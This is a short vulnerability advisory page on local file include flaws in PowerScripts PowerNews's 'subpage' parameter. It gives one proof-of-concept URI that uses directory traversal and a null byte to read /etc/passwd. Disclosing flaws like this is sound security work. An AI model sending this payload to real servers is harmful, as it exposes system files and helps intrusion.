• info
• discussion
• exploit
• solution
• references

PowerScripts PowerNews 'subpage' Parameter Multiple Local File Include Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://example.com/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00